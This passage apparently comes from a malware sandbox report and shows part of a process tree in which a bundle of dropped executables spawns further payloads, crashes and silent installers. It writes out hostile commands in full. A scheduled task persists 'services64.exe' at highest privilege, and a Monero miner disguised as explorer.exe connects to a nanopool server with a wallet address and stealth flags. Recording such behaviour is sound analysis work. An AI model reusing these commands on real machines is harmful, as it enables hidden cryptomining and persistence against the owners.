                                                                                                                                    • C:\Users\Admin\AppData\Roaming\5328301.scr
                                                                                                                                      "C:\Users\Admin\AppData\Roaming\5328301.scr"
                                                                                                                                      7⤵
                                                                                                                                        PID:3596
                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 956 -s 1084
                                                                                                                                        7⤵
                                                                                                                                        • Program crash
                                                                                                                                        PID:884
                                                                                                                                    • C:\Users\Admin\AppData\Roaming\1655809.scr
                                                                                                                                      "C:\Users\Admin\AppData\Roaming\1655809.scr" /S
                                                                                                                                      6⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                      PID:6016
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  C:\Windows\system32\cmd.exe /c Sun1908b94df837b3158.exe
                                                                                                                                  4⤵
                                                                                                                                    PID:4500
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zSC8367590\Sun1908b94df837b3158.exe
                                                                                                                                      Sun1908b94df837b3158.exe
                                                                                                                                      5⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      PID:4744
                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4744 -s 264
                                                                                                                                        6⤵
                                                                                                                                        • Drops file in Windows directory
                                                                                                                                        • Program crash
                                                                                                                                        • Checks processor information in registry
                                                                                                                                        • Enumerates system info in registry
                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                        PID:5576
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /c Sun19de8ff4b6aefeb8.exe /mixone
                                                                                                                                    4⤵
                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                    PID:880
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zSC8367590\Sun19de8ff4b6aefeb8.exe
                                                                                                                                      Sun19de8ff4b6aefeb8.exe /mixone
                                                                                                                                      5⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      PID:4768
                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4768 -s 260
                                                                                                                                        6⤵
                                                                                                                                        • Program crash
                                                                                                                                        • Checks processor information in registry
                                                                                                                                        • Enumerates system info in registry
                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                        PID:5544
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /c Sun191101c1aaa.exe
                                                                                                                                    4⤵
                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                    PID:648
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zSC8367590\Sun191101c1aaa.exe
                                                                                                                                      Sun191101c1aaa.exe
                                                                                                                                      5⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:2160
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                                                                        6⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        PID:5992
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
                                                                                                                                          7⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          PID:5044
                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                            "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                                                                                                                                            8⤵
                                                                                                                                              PID:3116
                                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                                schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                                                                                                                                                9⤵
                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                PID:6396
                                                                                                                                            • C:\Users\Admin\AppData\Roaming\services64.exe
                                                                                                                                              "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                                                                                                              8⤵
                                                                                                                                                PID:6488
                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                                                                                                                                                  9⤵
                                                                                                                                                    PID:2724
                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                      schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                                                                                                                                                      10⤵
                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                      PID:5904
                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                                                                                                    9⤵
                                                                                                                                                      PID:5020
                                                                                                                                                    • C:\Windows\explorer.exe
                                                                                                                                                      C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
                                                                                                                                                      9⤵
                                                                                                                                                        PID:884
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"
                                                                                                                                                    7⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                    PID:5260
                                                                                                                                                    • C:\ProgramData\3740635.exe
                                                                                                                                                      "C:\ProgramData\3740635.exe"
                                                                                                                                                      8⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                      PID:1780
                                                                                                                                                    • C:\ProgramData\6167833.exe
                                                                                                                                                      "C:\ProgramData\6167833.exe"
                                                                                                                                                      8⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                      PID:4924
                                                                                                                                                    • C:\ProgramData\3635134.exe
                                                                                                                                                      "C:\ProgramData\3635134.exe"
                                                                                                                                                      8⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      PID:1604
                                                                                                                                                      • C:\ProgramData\3635134.exe
                                                                                                                                                        "C:\ProgramData\3635134.exe"
                                                                                                                                                        9⤵
                                                                                                                                                          PID:5608
                                                                                                                                                        • C:\ProgramData\3635134.exe
                                                                                                                                                          "C:\ProgramData\3635134.exe"
                                                                                                                                                          9⤵
                                                                                                                                                            PID:5500
                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 1604 -s 1084
                                                                                                                                                            9⤵
                                                                                                                                                            • Program crash
                                                                                                                                                            PID:6324
                                                                                                                                                        • C:\ProgramData\1415329.exe
                                                                                                                                                          "C:\ProgramData\1415329.exe"
                                                                                                                                                          8⤵
                                                                                                                                                            PID:1192
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\2.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\2.exe"
                                                                                                                                                          7⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                          PID:3980
                                                                                                                                                          • C:\Windows\system32\WerFault.exe
                                                                                                                                                            C:\Windows\system32\WerFault.exe -u -p 3980 -s 1724
                                                                                                                                                            8⤵
                                                                                                                                                            • Program crash
                                                                                                                                                            PID:580
                                                                                                                                                          • C:\Windows\system32\WerFault.exe
                                                                                                                                                            C:\Windows\system32\WerFault.exe -u -p 3980 -s 1724
                                                                                                                                                            8⤵
                                                                                                                                                            • Program crash
                                                                                                                                                            PID:5072
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                                                                                                                                          7⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          PID:4648
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\udptest.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\udptest.exe"
                                                                                                                                                          7⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          PID:856
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\5.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\5.exe"
                                                                                                                                                          7⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                          PID:1280
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecF18.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecF18.exe"
                                                                                                                                                          7⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          PID:5324
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\tmp49A_tmp.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\tmp49A_tmp.exe"
                                                                                                                                                            8⤵
                                                                                                                                                              PID:2272
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\tmp49A_tmp.exe
                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\tmp49A_tmp.exe
                                                                                                                                                                9⤵
                                                                                                                                                                  PID:2428
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\setup_2.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
                                                                                                                                                              7⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              PID:2344
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-HRIG2.tmp\setup_2.tmp
                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-HRIG2.tmp\setup_2.tmp" /SL5="$20240,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
                                                                                                                                                                8⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                PID:5784
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\setup_2.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
                                                                                                                                                                  9⤵
                                                                                                                                                                    PID:768
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-5J3I6.tmp\setup_2.tmp
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-5J3I6.tmp\setup_2.tmp" /SL5="$40292,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
                                                                                                                                                                      10⤵
                                                                                                                                                                        PID:1608
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-L5LMM.tmp\postback.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-L5LMM.tmp\postback.exe" ss1
                                                                                                                                                                          11⤵
                                                                                                                                                                            PID:2420
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\3002.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\3002.exe"
                                                                                                                                                                    7⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    PID:2996
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\3002.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\3002.exe" -a
                                                                                                                                                                      8⤵
                                                                                                                                                                        PID:1052
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
                                                                                                                                                                      7⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      PID:4600
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"
                                                                                                                                                                      7⤵
                                                                                                                                                                        PID:1556
                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  C:\Windows\system32\cmd.exe /c Sun19eb40faaaa9.exe
                                                                                                                                                                  4⤵
                                                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                                                  PID:1472
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC8367590\Sun19eb40faaaa9.exe
                                                                                                                                                                    Sun19eb40faaaa9.exe
                                                                                                                                                                    5⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    PID:4804
                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4804 -s 260
                                                                                                                                                                      6⤵
                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                      • Program crash
                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                      • Enumerates system info in registry
                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                      PID:5604
                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  C:\Windows\system32\cmd.exe /c Sun198361825f4.exe
                                                                                                                                                                  4⤵
                                                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                                                  PID:1300
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC8367590\Sun198361825f4.exe
                                                                                                                                                                    Sun198361825f4.exe
                                                                                                                                                                    5⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    PID:2176
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\tmpEE62_tmp.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\tmpEE62_tmp.exe"
                                                                                                                                                                      6⤵
                                                                                                                                                                        PID:6368
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\tmpEE62_tmp.exe
                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\tmpEE62_tmp.exe
                                                                                                                                                                          7⤵
                                                                                                                                                                            PID:3056
                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      C:\Windows\system32\cmd.exe /c Sun1905815e51282417.exe
                                                                                                                                                                      4⤵
                                                                                                                                                                        PID:4820
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zSC8367590\Sun1905815e51282417.exe
                                                                                                                                                                          Sun1905815e51282417.exe
                                                                                                                                                                          5⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          PID:4788
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        C:\Windows\system32\cmd.exe /c Sun1966fb31dd5a07.exe
                                                                                                                                                                        4⤵
                                                                                                                                                                          PID:5032
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSC8367590\Sun1966fb31dd5a07.exe
                                                                                                                                                                            Sun1966fb31dd5a07.exe
                                                                                                                                                                            5⤵
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            PID:3268
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-2UVEG.tmp\Sun1966fb31dd5a07.tmp
                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-2UVEG.tmp\Sun1966fb31dd5a07.tmp" /SL5="$30080,247014,163328,C:\Users\Admin\AppData\Local\Temp\7zSC8367590\Sun1966fb31dd5a07.exe"
                                                                                                                                                                              6⤵
                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                              PID:5208
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-8OCO5.tmp\Ze2ro.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-8OCO5.tmp\Ze2ro.exe" /S /UID=burnerch2
                                                                                                                                                                                7⤵
                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                PID:5692
                                                                                                                                                                                • C:\Program Files\Windows Defender\TYDAXANEEU\ultramediaburner.exe
                                                                                                                                                                                  "C:\Program Files\Windows Defender\TYDAXANEEU\ultramediaburner.exe" /VERYSILENT
                                                                                                                                                                                  8⤵
                                                                                                                                                                                    PID:6244
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-LO267.tmp\ultramediaburner.tmp
                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-LO267.tmp\ultramediaburner.tmp" /SL5="$60400,281924,62464,C:\Program Files\Windows Defender\TYDAXANEEU\ultramediaburner.exe" /VERYSILENT
                                                                                                                                                                                      9⤵
                                                                                                                                                                                        PID:6632
                                                                                                                                                                                        • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                                                                          "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                                                                                                                                          10⤵
                                                                                                                                                                                            PID:6332
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\ac-cfe7f-5bb-7e797-d77ee624710ac\Duraegyvyde.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\ac-cfe7f-5bb-7e797-d77ee624710ac\Duraegyvyde.exe"
                                                                                                                                                                                        8⤵
                                                                                                                                                                                          PID:3040
                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mtp3n11z.shi\GcleanerEU.exe /eufive & exit
                                                                                                                                                                                            9⤵
                                                                                                                                                                                              PID:2536
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\mtp3n11z.shi\GcleanerEU.exe
                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\mtp3n11z.shi\GcleanerEU.exe /eufive
                                                                                                                                                                                                10⤵
                                                                                                                                                                                                  PID:1196
                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 1196 -s 260
                                                                                                                                                                                                    11⤵
                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                    PID:3124
                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0vxuh3lx.1y0\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                                                                                9⤵
                                                                                                                                                                                                  PID:3792
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\0vxuh3lx.1y0\installer.exe
                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\0vxuh3lx.1y0\installer.exe /qn CAMPAIGN="654"
                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                      PID:1212
                                                                                                                                                                                                      • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\0vxuh3lx.1y0\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\0vxuh3lx.1y0\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1632112836 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                                                                                                                                                                                        11⤵
                                                                                                                                                                                                          PID:3324
                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2as2fgdm.zkt\anyname.exe & exit
                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                        PID:6192
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\2as2fgdm.zkt\anyname.exe
                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\2as2fgdm.zkt\anyname.exe
                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                            PID:6776
                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0xf2nm5s.mvz\gcleaner.exe /mixfive & exit
                                                                                                                                                                                                          9⤵
                                                                                                                                                                                                            PID:3428
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\0xf2nm5s.mvz\gcleaner.exe
                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\0xf2nm5s.mvz\gcleaner.exe /mixfive
                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                PID:5080
                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 5080 -s 252
                                                                                                                                                                                                                  11⤵
                                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                                  PID:6768
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\d4-840d5-152-f5381-ab546db59b03b\Lajetaeqyfe.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\d4-840d5-152-f5381-ab546db59b03b\Lajetaeqyfe.exe"
                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                              PID:6136
                                                                                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
                                                                                                                                                                                                                9⤵
                                                                                                                                                                                                                  PID:5556
                                                                                                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7e046f8,0x7ff8f7e04708,0x7ff8f7e04718
                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                      PID:6080
                                                                                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,4229441788216642219,11229104568541566565,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2164 /prefetch:2
                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                        PID:6892
                                                                                                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2140,4229441788216642219,11229104568541566565,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2216 /prefetch:3
                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                          PID:6036
                                                                                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2140,4229441788216642219,11229104568541566565,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2688 /prefetch:8
                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                            PID:7140
                                                                                                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,4229441788216642219,11229104568541566565,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3764 /prefetch:1
                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                              PID:5692
                                                                                                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,4229441788216642219,11229104568541566565,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3788 /prefetch:1
                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                PID:6744
                                                                                                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,4229441788216642219,11229104568541566565,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5112 /prefetch:1
                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                  PID:6760
                                                                                                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,4229441788216642219,11229104568541566565,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5156 /prefetch:1
                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                    PID:4704
                                                                                                                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,4229441788216642219,11229104568541566565,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5736 /prefetch:1
                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                      PID:5440
                                                                                                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
                                                                                                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2140,4229441788216642219,11229104568541566565,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5964 /prefetch:8
                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                        PID:2660
                                                                                                                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
                                                                                                                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2140,4229441788216642219,11229104568541566565,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5964 /prefetch:8
                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                          PID:2424
                                                                                                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
